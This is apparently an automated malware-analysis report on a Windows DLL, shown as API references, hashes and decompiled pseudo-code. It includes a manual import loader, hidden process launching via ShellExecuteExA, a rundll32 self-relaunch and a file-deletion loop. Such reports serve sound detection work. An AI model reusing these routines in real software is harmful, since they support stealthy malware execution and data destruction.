0x6eca1f6c
0x6eca1f6c
0x6eca1f70
0x00000000
0x6eca1f70
0x6eca1ec2
0x6eca1ed0
0x6eca1ed4
0x6eca1f3e
0x6eca1f3f
0x6eca1f4a
0x00000000
0x00000000
0x6eca1f4c
0x00000000
0x6eca1f4c
0x6eca1ed6
0x6eca1eda
0x6eca1ee1
0x6eca1ee5
0x6eca1ef4
0x6eca1ef5
0x6eca1f08
0x6eca1f0f
0x6eca1f13
0x6eca1f14
0x6eca1f1a
0x6eca1f1d
0x6eca1f1e
0x6eca1f22
0x6eca1f26
0x6eca1f2a
0x6eca1f2e
0x6eca1f33
0x6eca1f37
0x6eca1f3a
0x6eca1f3a
0x00000000
0x6eca1f3a
0x6eca1eee
0x6eca1ef2
0x00000000
0x00000000
0x00000000
0x6eca1ef2
0x6eca1f74
0x6eca1f78
0x6eca1f79
0x6eca1f80
0x6eca1e30
0x00000000
0x6eca1e30
0x6eca1f86
0x00000000
0x6eca1f8b
0x6eca1e34

APIs

lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1E3E
RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6ECA1E48
StrDupA.SHLWAPI(?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1EAF
StrChrA.SHLWAPI(00000000,0000002E,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1ECA
GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1EDB
LoadLibraryA.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1EE8
lstrlenA.KERNEL32(00000001,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1EFD
RtlComputeCrc32.NTDLL(00000000,00000001,00000000), ref: 6ECA1F08
LocalFree.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6ECA9D7B), ref: 6ECA1F3F

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputeCrc32lstrlen$FreeHandleLibraryLoadLocalModule
String ID:
API String ID: 1770823755-0
Opcode ID: 85261b7aa76f721d456226f4ae707ca36e01232a25792d2797883dae533cd0cc
Instruction ID: c2ec83c8c5c6cf819cf95484522207fc7ae6eab91d93b820aa4799c498ce9523
Opcode Fuzzy Hash: 85261b7aa76f721d456226f4ae707ca36e01232a25792d2797883dae533cd0cc
Instruction Fuzzy Hash: 785135B41093428FC700DF9CC894A5BBBF5BF89708F04491DFA9597345EBB1E9098B96

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA3180, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E6ECA3180(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t21;
				void* _t22;

				_t21 = 0;
				_t22 = HeapAlloc(GetProcessHeap(), 8, 0x800);
				if(_t22 != 0) {
					_t21 = RtlComputeCrc32(0, _t22, wsprintfA(_t22, "%s%s%s%c", _a4, _a8, _a12, 2)) % 0xffffff7f;
					asm("bswap edi");
					HeapFree(GetProcessHeap(), 0, _t22);
				}
				return _t21;
			}

0x6eca3190
0x6eca319b
0x6eca319f
0x6eca31d5
0x6eca31d7
0x6eca31dc
0x6eca31dc
0x6eca31e7

APIs

GetProcessHeap.KERNEL32(00000008,00000800), ref: 6ECA3192
HeapAlloc.KERNEL32(00000000), ref: 6ECA3195
wsprintfA.USER32 ref: 6ECA31B8
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6ECA31C4
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 6ECA31D9
HeapFree.KERNEL32(00000000), ref: 6ECA31DC

Strings

%s%s%s%c, xrefs: 6ECA31B2

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocComputeCrc32Freewsprintf
String ID: %s%s%s%c
API String ID: 3834306679-489954935
Opcode ID: c5c8dd66cb1463e5235e69e955054958cd448733ef61d3a8883cf533ca4dbb5d
Instruction ID: a5f93be36df3f72bf5020acac50a3cac3955d9abf24ebbbe506c3d2540fce329
Opcode Fuzzy Hash: c5c8dd66cb1463e5235e69e955054958cd448733ef61d3a8883cf533ca4dbb5d
Instruction Fuzzy Hash: 7FF02B717416113BE200966D8C4CEBF7A6EEFC9715F008114FE0887280DA60CC018AB1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA1720, Relevance: 10.6, APIs: 7, Instructions: 138
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA1720(void* __edi) {
				struct HINSTANCE__* _v4;
				intOrPtr* _v8;
				intOrPtr _t40;
				intOrPtr _t42;
				struct HINSTANCE__* _t44;
				signed int _t46;
				intOrPtr _t47;
				signed short _t48;
				CHAR* _t49;
				_Unknown_base(*)()* _t51;
				signed int _t53;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				void* _t60;
				intOrPtr* _t67;
				signed short* _t70;
				intOrPtr _t75;
				intOrPtr* _t78;
				void* _t83;
				signed short* _t88;
				void* _t94;
				signed short _t114;

				_t83 = __edi;
				_t40 =  *((intOrPtr*)(__edi + 0xc0));
				if(_t40 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
					return 0;
				} else {
					_t67 =  *((intOrPtr*)(__edi + 0x144)) + _t40;
					_t42 =  *((intOrPtr*)(_t67 + 0xc));
					_v8 = _t67;
					if(_t42 == 0) {
						L30:
						return 0;
					} else {
						_t94 = _v4;
						while(1) {
							_t44 = LoadLibraryA( *((intOrPtr*)(_t83 + 0x144)) + _t42);
							_v4 = _t44;
							if(_t44 == 0) {
								break;
							}
							_t46 =  *(_t83 + 0x154);
							if( *(_t83 + 0x150) < _t46) {
								L16:
								if(_t94 != 0) {
									_t53 =  *(_t83 + 0x150);
									_t54 = _t53 + 1;
									 *(_t83 + 0x150) = _t54;
									if( *((intOrPtr*)(_t94 + _t53 * 4)) != 0) {
										 *((intOrPtr*)(_t94 + _t54 * 4)) = _v4;
										 *(_t83 + 0x150) =  *(_t83 + 0x150) + 1;
									}
								}
								_t47 =  *((intOrPtr*)(_t83 + 0x144));
								_t78 = _v8;
								_t88 =  *((intOrPtr*)(_t67 + 0x10)) + _t47;
								_t70 = _t88;
								if( *((intOrPtr*)(_t78 + 4)) == 0) {
									L22:
									_t48 =  *_t70;
									_t114 = _t48;
									if(_t114 == 0) {
										L29:
										_t42 =  *((intOrPtr*)(_t78 + 0x20));
										_v8 = _t78 + 0x14;
										if(_t42 != 0) {
											_t67 = _v8;
											continue;
										} else {
											goto L30;
										}
									} else {
										L23:
										L23:
										if(_t114 >= 0) {
											_t49 = _t48 +  *((intOrPtr*)(_t83 + 0x144)) + 2;
										} else {
											_t49 = _t48 & 0x0000ffff;
										}
										_t51 = GetProcAddress(_v4, _t49);
										 *_t88 = _t51;
										if(_t51 == 0) {
											break;
										}
										_t48 = _t70[2];
										_t70 =  &(_t70[2]);
										_t88 =  &(_t88[2]);
										if(_t48 != 0) {
											goto L23;
										} else {
											_t78 = _v8;
											goto L29;
										}
									}
								} else {
									_t75 =  *_t78;
									if(_t75 == 0) {
										return 8;
									} else {
										_t70 = _t75 + _t47;
										goto L22;
									}
								}
							} else {
								if(_t46 == 0) {
									_t55 = 0x10;
								} else {
									_t55 = _t46 + _t46;
								}
								 *(_t83 + 0x154) = _t55;
								_t94 = HeapAlloc(GetProcessHeap(), 8, _t55 * 4);
								if(_t94 == 0) {
									return 3;
								} else {
									_t59 =  *(_t83 + 0x150);
									if(_t59 != 0) {
										RtlMoveMemory(_t94,  *(_t83 + 0x14c), _t59 + _t59 + _t59 + _t59);
									}
									_t60 =  *(_t83 + 0x14c);
									if(_t60 != 0) {
										HeapFree(GetProcessHeap(), 0, _t60);
									}
									 *(_t83 + 0x14c) = _t94;
									goto L16;
								}
							}
							goto L35;
						}
						return 6;
					}
				}
				L35:
			}

0x6eca1720
0x6eca1720
0x6eca172b
0x6eca18c0
0x6eca173e
0x6eca1745
0x6eca1747
0x6eca174c
0x6eca1752
0x6eca188e
0x6eca1896
0x6eca1758
0x6eca1758
0x6eca1764
0x6eca176d
0x6eca1773
0x6eca1779
0x00000000
0x00000000
0x6eca177f
0x6eca178b
0x6eca17fb
0x6eca17fd
0x6eca17ff
0x6eca1809
0x6eca180a
0x6eca1812
0x6eca1818
0x6eca181c
0x6eca181c
0x6eca1812
0x6eca1825
0x6eca182b
0x6eca182f
0x6eca1835
0x6eca1837
0x6eca1842
0x6eca1842
0x6eca1844
0x6eca1846
0x6eca187c
0x6eca187c
0x6eca1882
0x6eca1888
0x6eca1760
0x00000000
0x00000000
0x00000000
0x00000000
0x6eca1848
0x00000000
0x6eca1848
0x6eca1848
0x6eca1855
0x6eca184a
0x6eca184a
0x6eca184a
0x6eca185f
0x6eca1865
0x6eca1869
0x00000000
0x00000000
0x6eca186b
0x6eca186e
0x6eca1871
0x6eca1876
0x00000000
0x6eca1878
0x6eca1878
0x00000000
0x6eca1878
0x6eca1876
0x6eca1839
0x6eca1839
0x6eca183d
0x6eca18ae
0x6eca183f
0x6eca183f
0x00000000
0x6eca183f
0x6eca183d
0x6eca178d
0x6eca178f
0x6eca1795
0x6eca1791
0x6eca1791
0x6eca1791
0x6eca17aa
0x6eca17b9
0x6eca17bd
0x6eca18a2
0x6eca17c3
0x6eca17c3
0x6eca17cb
0x6eca17da
0x6eca17da
0x6eca17df
0x6eca17e7
0x6eca17ef
0x6eca17ef
0x6eca17f5
0x00000000
0x6eca17f5
0x6eca17bd
0x00000000
0x6eca178b
0x6eca18ba
0x6eca18ba
0x6eca1752
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 6ECA176D
GetProcessHeap.KERNEL32(00000008), ref: 6ECA17B0
HeapAlloc.KERNEL32(00000000), ref: 6ECA17B3
RtlMoveMemory.NTDLL(00000000,?,?), ref: 6ECA17DA
GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA17EC
HeapFree.KERNEL32(00000000), ref: 6ECA17EF
GetProcAddress.KERNEL32(?,?), ref: 6ECA185F

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
String ID:
API String ID: 2239585089-0
Opcode ID: bafc292bdfc7496d95906a106a29c2dc29a7cb03e88a3b74a1ef7df3dc6485b2
Instruction ID: 0adb1068b09d416b425a720b26628d28c2efb01150126ebe320df3fb23253dfc
Opcode Fuzzy Hash: bafc292bdfc7496d95906a106a29c2dc29a7cb03e88a3b74a1ef7df3dc6485b2
Instruction Fuzzy Hash: 92416DB47007079BEB449FADD954BA6B7A5FB44315F058569ED28CB304E734E818CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA175E, Relevance: 10.6, APIs: 7, Instructions: 98
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA175E(intOrPtr __eax, void* __edi, intOrPtr* _a12, struct HINSTANCE__* _a16) {
				intOrPtr _t34;
				struct HINSTANCE__* _t35;
				signed int _t37;
				intOrPtr _t38;
				signed short _t39;
				CHAR* _t41;
				_Unknown_base(*)()* _t43;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t51;
				void* _t52;
				intOrPtr* _t57;
				signed short* _t59;
				intOrPtr _t65;
				intOrPtr* _t68;
				void* _t73;
				signed short* _t76;
				void* _t81;
				signed short _t103;

				_t73 = __edi;
				_t34 = __eax;
				while(1) {
					_t57 = _a12;
					_t35 = LoadLibraryA( *((intOrPtr*)(_t73 + 0x144)) + _t34);
					_a16 = _t35;
					if(_t35 == 0) {
						break;
					}
					_t37 =  *(_t73 + 0x154);
					if( *(_t73 + 0x150) < _t37) {
						L13:
						if(_t81 != 0) {
							_t45 =  *(_t73 + 0x150);
							_t46 = _t45 + 1;
							 *(_t73 + 0x150) = _t46;
							if( *((intOrPtr*)(_t81 + _t45 * 4)) != 0) {
								 *((intOrPtr*)(_t81 + _t46 * 4)) = _a16;
								 *(_t73 + 0x150) =  *(_t73 + 0x150) + 1;
							}
						}
						_t38 =  *((intOrPtr*)(_t73 + 0x144));
						_t68 = _a12;
						_t76 =  *((intOrPtr*)(_t57 + 0x10)) + _t38;
						_t59 = _t76;
						if( *((intOrPtr*)(_t68 + 4)) == 0) {
							L19:
							_t39 =  *_t59;
							_t103 = _t39;
							if(_t103 == 0) {
								L26:
								_t34 =  *((intOrPtr*)(_t68 + 0x20));
								_a12 = _t68 + 0x14;
								if(_t34 != 0) {
									continue;
								} else {
									return 0;
								}
							} else {
								L20:
								L20:
								if(_t103 >= 0) {
									_t41 = _t39 +  *((intOrPtr*)(_t73 + 0x144)) + 2;
								} else {
									_t41 = _t39 & 0x0000ffff;
								}
								_t43 = GetProcAddress(_a16, _t41);
								 *_t76 = _t43;
								if(_t43 == 0) {
									break;
								}
								_t39 = _t59[2];
								_t59 =  &(_t59[2]);
								_t76 =  &(_t76[2]);
								if(_t39 != 0) {
									goto L20;
								} else {
									_t68 = _a12;
									goto L26;
								}
							}
						} else {
							_t65 =  *_t68;
							if(_t65 == 0) {
								return 8;
							} else {
								_t59 = _t65 + _t38;
								goto L19;
							}
						}
					} else {
						if(_t37 == 0) {
							_t47 = 0x10;
						} else {
							_t47 = _t37 + _t37;
						}
						 *(_t73 + 0x154) = _t47;
						_t81 = HeapAlloc(GetProcessHeap(), 8, _t47 * 4);
						if(_t81 == 0) {
							return 3;
						} else {
							_t51 =  *(_t73 + 0x150);
							if(_t51 != 0) {
								RtlMoveMemory(_t81,  *(_t73 + 0x14c), _t51 + _t51 + _t51 + _t51);
							}
							_t52 =  *(_t73 + 0x14c);
							if(_t52 != 0) {
								HeapFree(GetProcessHeap(), 0, _t52);
							}
							 *(_t73 + 0x14c) = _t81;
							goto L13;
						}
					}
					L31:
				}
				return 6;
				goto L31;
			}

0x6eca175e
0x6eca175e
0x6eca1760
0x6eca1760
0x6eca176d
0x6eca1773
0x6eca1779
0x00000000
0x00000000
0x6eca177f
0x6eca178b
0x6eca17fb
0x6eca17fd
0x6eca17ff
0x6eca1809
0x6eca180a
0x6eca1812
0x6eca1818
0x6eca181c
0x6eca181c
0x6eca1812
0x6eca1825
0x6eca182b
0x6eca182f
0x6eca1835
0x6eca1837
0x6eca1842
0x6eca1842
0x6eca1844
0x6eca1846
0x6eca187c
0x6eca187c
0x6eca1882
0x6eca1888
0x00000000
0x6eca188e
0x6eca1896
0x6eca1896
0x6eca1848
0x00000000
0x6eca1848
0x6eca1848
0x6eca1855
0x6eca184a
0x6eca184a
0x6eca184a
0x6eca185f
0x6eca1865
0x6eca1869
0x00000000
0x00000000
0x6eca186b
0x6eca186e
0x6eca1871
0x6eca1876
0x00000000
0x6eca1878
0x6eca1878
0x00000000
0x6eca1878
0x6eca1876
0x6eca1839
0x6eca1839
0x6eca183d
0x6eca18ae
0x6eca183f
0x6eca183f
0x00000000
0x6eca183f
0x6eca183d
0x6eca178d
0x6eca178f
0x6eca1795
0x6eca1791
0x6eca1791
0x6eca1791
0x6eca17aa
0x6eca17b9
0x6eca17bd
0x6eca18a2
0x6eca17c3
0x6eca17c3
0x6eca17cb
0x6eca17da
0x6eca17da
0x6eca17df
0x6eca17e7
0x6eca17ef
0x6eca17ef
0x6eca17f5
0x00000000
0x6eca17f5
0x6eca17bd
0x00000000
0x6eca178b
0x6eca18ba
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 6ECA176D
GetProcessHeap.KERNEL32(00000008), ref: 6ECA17B0
HeapAlloc.KERNEL32(00000000), ref: 6ECA17B3
RtlMoveMemory.NTDLL(00000000,?,?), ref: 6ECA17DA
GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA17EC
HeapFree.KERNEL32(00000000), ref: 6ECA17EF
GetProcAddress.KERNEL32(?,?), ref: 6ECA185F

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
String ID:
API String ID: 2239585089-0
Opcode ID: 018c14f5987ff35fe1938d19b645e29bb3bf1c5fbbb57bb34a808b4776fc8471
Instruction ID: f20c6efff91a0a937311c3a180916b16075210689d6170a007e3d42a2972bb5e
Opcode Fuzzy Hash: 018c14f5987ff35fe1938d19b645e29bb3bf1c5fbbb57bb34a808b4776fc8471
Instruction Fuzzy Hash: 6F314CB4A007079BE744CFADD954BA6B7A9FB88305F018569ED29CB304F730E818CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA4230, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E6ECA4230(intOrPtr _a4, intOrPtr _a8, DWORD* _a12) {
				intOrPtr _v0;
				intOrPtr _v4;
				struct _SHELLEXECUTEINFOA _v68;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				int _t25;
				DWORD* _t27;
				int _t35;
				signed int _t38;
				long _t40;

				_push(0x3c);
				_push( &(_v68.hwnd));
				L6ECAC2EE();
				_t22 = _v0;
				_v68.cbSize = 0x3c;
				_v68.fMask = 0x800400;
				_v68.nShow = 0;
				if(_t22 != 0) {
					_v68.lpFile = _t22;
				}
				_t23 = _a4;
				if(_t23 != 0) {
					_v68.lpParameters = _t23;
				}
				_t24 = _v4;
				if(_t24 != 0) {
					_v68.lpVerb = _t24;
				}
				if(_a8 == 0) {
					_v68.fMask = 0x808400;
				} else {
					_v68.nShow = 1;
				}
				_t38 = _a12;
				if(_t38 != 0) {
					_v68.fMask = _v68.fMask | 0x00000040;
				}
				_t25 = ShellExecuteExA( &_v68);
				_t35 = _t25;
				if(_t35 != 0 && _t38 != 0) {
					if(_t38 == 0xffffffff) {
						_t40 = _t38 | 0xffffffff;
					} else {
						_t40 = _t38 * 0x3e8;
					}
					WaitForSingleObject(_v68.hIcon, _t40);
					_t27 = _a12;
					if(_t27 != 0) {
						GetExitCodeProcess(_v68.hIcon, _t27);
					}
					CloseHandle(_v68.hIcon);
					_t25 = _t35;
				}
				return _t25;
			}

0x6eca4233
0x6eca4239
0x6eca423a
0x6eca423f
0x6eca4243
0x6eca424a
0x6eca4252
0x6eca425c
0x6eca425e
0x6eca425e
0x6eca4262
0x6eca4268
0x6eca426a
0x6eca426a
0x6eca426e
0x6eca4274
0x6eca4276
0x6eca4276
0x6eca427f
0x6eca428b
0x6eca4281
0x6eca4281
0x6eca4281
0x6eca4294
0x6eca429b
0x6eca429d
0x6eca429d
0x6eca42a7
0x6eca42ad
0x6eca42b1
0x6eca42ba
0x6eca42c4
0x6eca42bc
0x6eca42bc
0x6eca42bc
0x6eca42cd
0x6eca42d3
0x6eca42d9
0x6eca42e1
0x6eca42e1
0x6eca42ec
0x6eca42f2
0x6eca42f2
0x6eca42f9

APIs

RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6ECA423A
ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6ECA42A7
WaitForSingleObject.KERNEL32(?,?), ref: 6ECA42CD
GetExitCodeProcess.KERNEL32 ref: 6ECA42E1
CloseHandle.KERNEL32(?), ref: 6ECA42EC

Strings

@, xrefs: 6ECA429D

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCodeExecuteExitHandleMemoryObjectProcessShellSingleWaitZero
String ID: @
API String ID: 1639083440-2766056989
Opcode ID: c9999b6bb2a45f08d23318389a7cd228fe0b0adcfbd4410ba2c9666dce4497e2
Instruction ID: 54057a3d186e8bfcfaef3aa5c5b4ee36cabf0466ba66f765caaa050029c1e49b
Opcode Fuzzy Hash: c9999b6bb2a45f08d23318389a7cd228fe0b0adcfbd4410ba2c9666dce4497e2
Instruction Fuzzy Hash: 1F2128715097029BD3408A9D8544B5FBBF9BB85714F008A1DBAA497284EB74C806CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA5190, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6ECA5190(intOrPtr _a4) {
				char _v772;
				char _v780;
				void* _t4;
				char* _t5;
				char _t6;
				intOrPtr _t11;
				CHAR* _t14;

				_t11 = _a4;
				if(_t11 != 0x65 ||  *0x6ecb027c >= 6 && M6ECB0544 == 0 && M6ECB0548 != 0) {
					_t4 = OpenEventA(2, 0, "TVRF_Instance");
					if(_t4 == 0) {
						_t5 = M6ECB0530; // 0xcb2c98
						_t14 = M6ECB0524; // 0xcd1c70
						_t6 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
						wsprintfA( &_v780, "\"%s%s\" \"%s\",#%d %c \"%s\"", _t6, "rundll32.exe", _t14, 0x195, _t11, _t5);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						return E6ECA4EF0( &_v772, 1, 0);
					} else {
						CloseHandle(_t4);
						goto L6;
					}
				} else {
					L6:
					return 0;
				}
			}

0x6eca5197
0x6eca51a1
0x6eca51c7
0x6eca51cf
0x6eca51e2
0x6eca51e7
0x6eca51ee
0x6eca520d
0x6eca5213
0x6eca5215
0x6eca5217
0x6eca5219
0x6eca5233
0x6eca51d1
0x6eca51d2
0x00000000
0x6eca51d2
0x6eca51d8
0x6eca51d8
0x6eca51e1
0x6eca51e1

APIs

OpenEventA.KERNEL32(00000002,00000000,TVRF_Instance), ref: 6ECA51C7
CloseHandle.KERNEL32(00000000), ref: 6ECA51D2
wsprintfA.USER32 ref: 6ECA520D

Strings

TVRF_Instance, xrefs: 6ECA51BE
"%s%s" "%s",#%d %c "%s", xrefs: 6ECA5207
rundll32.exe, xrefs: 6ECA51FD

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEventHandleOpenwsprintf
String ID: "%s%s" "%s",#%d %c "%s"$TVRF_Instance$rundll32.exe
API String ID: 3063877008-2939335533
Opcode ID: ad452c2552351848df9b03bba34a11a097b57ac78093a2f6673a2fc0be17a7a2
Instruction ID: dbcd9f3f5c6c586b0a1426d288a2d4f2bc8b0cf0cef413f2477f3d6c70c133d5
Opcode Fuzzy Hash: ad452c2552351848df9b03bba34a11a097b57ac78093a2f6673a2fc0be17a7a2
Instruction Fuzzy Hash: CD01F7B1591702BBEF10D7A8CE56FB73BBAAB45709F404508BF1486584F2789548CF22

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA2E59, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA2E59(struct _WIN32_FIND_DATAA _a16, char _a60, char _a336, char _a344) {
				signed char _t9;
				CHAR* _t16;
				void* _t18;
				void* _t23;
				void* _t28;

				do {
					_t9 = _a16.dwFileAttributes;
					if((_t9 & 0x00000010) == 0 && _t9 != 0) {
						wsprintfA( &_a336, "%s%s", _t18,  &_a60);
						_t28 = _t28 + 0x10;
						_t16 = DeleteFileA( &_a344);
						if(_t16 == 0) {
							MoveFileExA( &_a344, _t16, 4);
						}
					}
				} while (FindNextFileA(_t23,  &_a16) != 0);
				FindClose(_t23);
				return 1;
			}

0x6eca2e60
0x6eca2e60
0x6eca2e66
0x6eca2e7f
0x6eca2e81
0x6eca2e8c
0x6eca2e94
0x6eca2ea1
0x6eca2ea1
0x6eca2ea7
0x6eca2eb8
0x6eca2ebd
0x6eca2ecf

APIs

wsprintfA.USER32 ref: 6ECA2E7F
DeleteFileA.KERNEL32(?), ref: 6ECA2E8C
MoveFileExA.KERNEL32 ref: 6ECA2EA1
FindNextFileA.KERNEL32(00000000,?), ref: 6ECA2EB2
FindClose.KERNEL32(00000000), ref: 6ECA2EBD

Strings

%s%s, xrefs: 6ECA2E79

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$CloseDeleteMoveNextwsprintf
String ID: %s%s
API String ID: 2350977733-3252725368
Opcode ID: f30f7d6d3de9e78fe4b86a46a95b702bdcdc73696cc847849e72f6346d20426c
Instruction ID: 43fd6af11a3032af3c189f9ae37ad077691d8074550beab07b17d405acaa64db
Opcode Fuzzy Hash: f30f7d6d3de9e78fe4b86a46a95b702bdcdc73696cc847849e72f6346d20426c
Instruction Fuzzy Hash: B7F08C31204305ABD760DAA8CC48FEF77BCEB85726F400829FE85C3104EB35A1448A52

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA4A20, Relevance: 9.2, APIs: 6, Instructions: 192
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E6ECA4A20() {
				char _v4;
				char _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr* _v56;
				intOrPtr* _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				char _v72;
				intOrPtr* _v76;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				intOrPtr* _v124;
				intOrPtr _v128;
				intOrPtr* _v132;
				intOrPtr* _v136;
				intOrPtr _v140;
				intOrPtr* _v148;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t84;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr* _t94;
				intOrPtr* _t97;
				intOrPtr* _t99;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
